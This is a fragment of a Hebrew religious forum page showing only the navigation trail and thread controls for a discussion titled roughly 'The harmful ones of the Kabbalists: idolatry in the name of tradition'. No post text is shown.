בית > פורומים > דת ואמונה > עצור כאן חושבים > המזיקים של המקובלים: עבודה זרה בשם המסורת
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 5 לדף הבא סך הכל 5 דפים.

bholext